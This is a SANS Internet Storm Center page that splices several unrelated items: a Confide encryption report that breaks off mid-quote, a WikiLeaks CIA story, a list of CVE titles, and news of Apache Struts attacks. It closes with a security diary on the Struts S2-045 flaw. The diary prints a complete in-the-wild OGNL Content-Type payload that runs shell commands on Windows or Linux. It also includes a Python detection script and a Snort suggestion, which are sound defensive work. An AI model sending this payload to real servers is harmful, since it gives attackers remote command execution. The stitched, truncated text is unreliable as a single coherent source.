(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 
 
OneThird CMS CVE-2017-2123 Cross Site Scripting Vulnerability
 


A pair of damning advisories independently published Wednesday raise serious questions about the security assurances of Confide, a messaging app that's billed as providing "battle tested, military grade" end-to-end encryption and is reportedly being used by individuals inside the US government.

One of the bulletins, published by security firm Quarkslab, warned that current versions of Confide—including those available for Macs, PCs, iPhones, Android devices, and Apple Watches—don't provide true end-to-end encryption at all, at least as that term is commonly defined. Unlike competing secure messaging app Signal—which prevents even authorized insiders from accessing the keys needed to decrypt messages—Confide engineers, or people who hack the Confide service, can easily create keys that can be used to decrypt messages as they're sent in real time.

Quarkslab researcher Jean-Baptiste Bédrune tested Confide and found that the main encryption layer protecting messages in transit is transport layer security (TLS), a protocol that's trivial for authorized people inside Confide to turn off. TLS has faced its share of bypass hacks over the more than two decades it has been in use. In Wednesday's post Bédrune wrote:


 

Julian Assange in his video press conference on Periscope on March 9.

The WikiLeaks selective dump of internal files from the CIA's espionage software development organization was accompanied by a press release from Julian Assange that went full-throttle on the dire nature of the CIA's hacking tools. While the documents themselves provide context that contradicts some of Assange's hype, there is certainly a major cause for concern that comes along with the press release: Assange claims that the CIA's tools are being shared "out of control" and may already be in use for nefarious purposes.

In a video statement on Periscope today, Assange asserted that the CIA "lost control of its entire cyber-weapons arsenal. Now, this is a historic act of devastating incompetence to have created such an arsenal and stored it all in one place and not secured it." Assange repeated the claim that WikiLeaks had stumbled upon the archive "as the result of it being passed around a number of different members of the US intelligence community out of control in unauthorized fashion."

When Assange released the first wave of documents, from what is apparently a recent archive from an internal CIA developer collaboration server, he did a number of things that WikiLeaks hasn't done in the past. Perhaps in response to some of the criticism leveled against WikiLeaks from others—including NSA whistleblower Edward Snowden—Assange and WikiLeaks largely redacted personal details of CIA employees from the dump. The group also held back the archives of the tools themselves (publishing instead text files with a list of the archives' contents). Assange has taken the position that this leak is primarily about protecting computer users around the world from the use of the tools that are part of the leak. He also insinuated WikiLeaks had evidence that the CIA spied on US citizens—or at least had implants on systems with US IP addresses.


 
Google Android libgdx CVE-2017-0477 Remote Code Execution Vulnerability
 
Google Android Framesequence Library CVE-2017-0478 Remote Code Execution Vulnerability
 
IBM Content Navigator CVE-2017-1146 Cross Site Scripting Vulnerability
 
IBM Tivoli System Automation for Multiplatforms Local Privilege Escalation Vulnerability
 
HP Intelligent Management Center CVE-2017-5790 Remote Code Execution Vulnerability
 
Google Android AOSP Messaging CVE-2017-0476 Memory Corruption Vulnerability
 
wuhu CVE-2017-6544 Cross Site Scripting Vulnerability
 
libevent Multiple Security Vulnerabilities
 
Linux kernel CVE-2017-6346 Use After Free Local Denial of Service Vulnerability
 
Linux kernel CVE-2017-6345 Local Denial of Service Vulnerability
 
Linux Kernel CVE-2017-2636 Local Privilege Escalation Vulnerability
 
Multiple D-Link Routers CVE-2017-3193 Stack Buffer Overflow Vulnerability
 
IBM Jazz Reporting Service CVE-2015-7464 Denial of Service Vulnerability
 
Nessus Arbitrary File Upload Vulnerability
 
Pharos PopUp Printer Client Multiple Heap Based Buffer Overflow Vulnerabilities
 
Pharos PopUp Printer Client CVE-2017-2787 Heap Based Buffer Overflow Vulnerability
 
Drupal Services Module Remote Code Execution Vulnerability
 
Google Android Qualcomm Camera Driver Multiple Information Disclosure Vulnerabilities
 
Oracle Java SE and JRockit CVE-2017-3252 Remote Security Vulnerability
 
Apache NiFi CVE-2017-5636 Remote Code Injection Vulnerability
 
Apache NiFi CVE-2017-5635 Security Bypass Vulnerability
 
Apache Struts CVE-2017-5638 Remote Code Execution Vulnerability
 
Google Android NVIDIA GPU Driver Multiple Privilege Escalation Vulnerabilities
 
Google Android MediaTek Components Multiple Privilege Escalation Vulnerabilities
 

One of two publicly available exploits for a critical Apache Struts vulnerability. (credit: Kevin Beaumont)

In a string of attacks that have escalated over the past 48 hours, hackers are actively exploiting a critical vulnerability that allows them to take almost complete control of Web servers used by banks, government agencies, and large Internet companies.

The code-execution bug resides in the Apache Struts 2 Web application framework and is trivial to exploit. Although maintainers of the open source project patched the vulnerability on Monday, it remains under attack by hackers who are exploiting it to inject commands of their choice into Struts servers that have yet to install the update, researchers are warning. Making matters worse, at least two working exploits are publicly available.

"If you run it against a vulnerable application, the result will be the remote execution of commands with the user running the server," Vicente Motos wrote of one of the exploits in a post published late Wednesday afternoon on the Hack Players website. "We have dedicated hours to reporting to companies, governments, manufacturers, and even individuals to patch and correct the vulnerability as soon as possible, but the exploit has already jumped to the big pages of 'advisories,' and massive attempts to exploit the Internet have already been observed."


 

On Monday, Apache released a patch for the Struts 2 framework [1]. The patch fixes an easy-to-exploit vulnerability in the multipart parser that is typically used for file uploads. A Metasploit module was released that same day, and some readers reported already seeing exploit attempts in the wild.

You should be running Struts 2.3.32 or 2.5.10.1. All prior versions are vulnerable.

Struts 2 is a Java framework that is commonly used by Java-based web applications. It is also known as Jakarta Struts and Apache Struts. The Apache project currently maintains Struts.

The vulnerability allows an attacker to include an OGNL expression in the Content-Type header. Below is a sample request seen in the wild; the lines preceding the Content-Type header were lost in extraction, and only this fragment of them survives:

...+http://www.baidu.com/search/spider.html
Content-Type: %{(#nike=multipart/form-data).([email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[com.opensymphony.xwork2.ActionContext.container]).(#ognlUtil=#container.getInstance(@[email protected])).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=echo \587d7b356191903a8ff327f548766288\).(#iswin=(@[email protected](os.name).toLowerCase().contains(win))).(#cmds=(#iswin?{cmd.exe,/c,#cmd}:{/bin/bash,-c,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@[email protected]().getOutputStream())).(@[email protected](#process.getInputStream(),#ros)).(#ros.flush())}
Accept: */*
Referer: http://linux.cn/
Accept-Language: zh-cn
Content-Length: 0
Host: [removed]
Connection: Keep-Alive

Yes... the Content-Type header is quite long, about 800 bytes. It should be easy to catch these exploit attempts with Snort by just setting the max_header_length parameter in the http_inspect preprocessor. I haven't tried it yet, but setting this to 500 should work fine (the default is 750, which should work too).

Snort.org included a rule in Tuesday's subscriber update.

The exploit should work on Windows and Linux. It tests which operating system it runs on via @[email protected](os.name). If it runs on Windows, it executes cmd.exe /c followed by a command (the echo command in the sample above). On Unix, it executes /bin/bash -c followed by the same command.
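The two detection signals the diary points at, an abnormally long Content-Type header and OGNL expression syntax where a MIME type belongs, are easy to check in a log-review script as well as in Snort. The following is an added example written for this post, not code from the diary or from Snort: it parses raw HTTP request headers and flags a request when the Content-Type value exceeds the 500-byte threshold suggested above or contains OGNL markers. The two sample requests, the host example.test and the marker list are constructed assumptions; the first request uses a padded placeholder expression, not the real payload.

```python
# Threshold on Content-Type length. The diary suggests 500 for Snort's
# max_header_length; the exploit header is about 800 bytes, while real
# multipart boundaries keep the value well under 200.
MAX_CONTENT_TYPE_LEN = 500

# Substrings that never appear in a legitimate Content-Type value but do
# appear in OGNL injection attempts (assumed marker list, not from the diary).
OGNL_MARKERS = ("%{", "#_memberAccess", "ProcessBuilder")

# Constructed samples: an oversized, OGNL-bearing Content-Type (placeholder
# expression padded to ~730 bytes) and a normal multipart upload.
SAMPLE_REQUESTS = [
    "POST /upload.action HTTP/1.1\r\n"
    "Host: example.test\r\n"
    "Content-Type: %{(#x='multipart/form-data')" + ".(#y=1)" * 100 + "}\r\n"
    "Content-Length: 0\r\n\r\n",
    "POST /upload.action HTTP/1.1\r\n"
    "Host: example.test\r\n"
    "Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxk\r\n"
    "Content-Length: 1234\r\n\r\n",
]


def parse_headers(raw):
    """Return {lowercased-name: value} for the header block of a raw HTTP request."""
    head = raw.split("\r\n\r\n", 1)[0]
    headers = {}
    # Skip the request line; header names are case-insensitive per RFC 7230.
    for line in head.split("\r\n")[1:]:
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        headers[name.strip().lower()] = value.strip()
    return headers


def inspect_request(raw):
    """Return the reasons a request looks like an S2-045 attempt (empty list = clean)."""
    content_type = parse_headers(raw).get("content-type", "")
    reasons = []
    if len(content_type) > MAX_CONTENT_TYPE_LEN:
        reasons.append(f"content-type length {len(content_type)} > {MAX_CONTENT_TYPE_LEN}")
    for marker in OGNL_MARKERS:
        if marker in content_type:
            reasons.append(f"ognl marker {marker!r} in content-type")
    return reasons


def scan(requests):
    """Inspect every request and return one reason list per request, in order."""
    return [inspect_request(r) for r in requests]


if __name__ == "__main__":
    for raw, reasons in zip(SAMPLE_REQUESTS, scan(SAMPLE_REQUESTS)):
        verdict = "ALERT" if reasons else "clean"
        print(f"{verdict}: {raw.splitlines()[0]} {reasons}")
```

The length check alone reproduces what the Snort max_header_length setting does; the marker check catches shorter variants that a length threshold would miss, so the two together are worth keeping even after the servers are patched.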

Commands I have seen so far:

Simple vulnerability checks:

echo Struts2045
echo \587d7b356191903a8ff327f548766288\
(VirusTotal identifies this as a generic backdoor. See https://www.virustotal.com/en/file/db98788729f4810f64f9ff7b279dd69ef47942b87fc259fefc56e30f3aedb171/analysis/ )

Packet capture of the exploit running against a lab system

[1] https://cwiki.apache.org/confluence/display/WW/S2-045

---
Johannes B. Ullrich, Ph.D.
STI | Twitter | LinkedIn
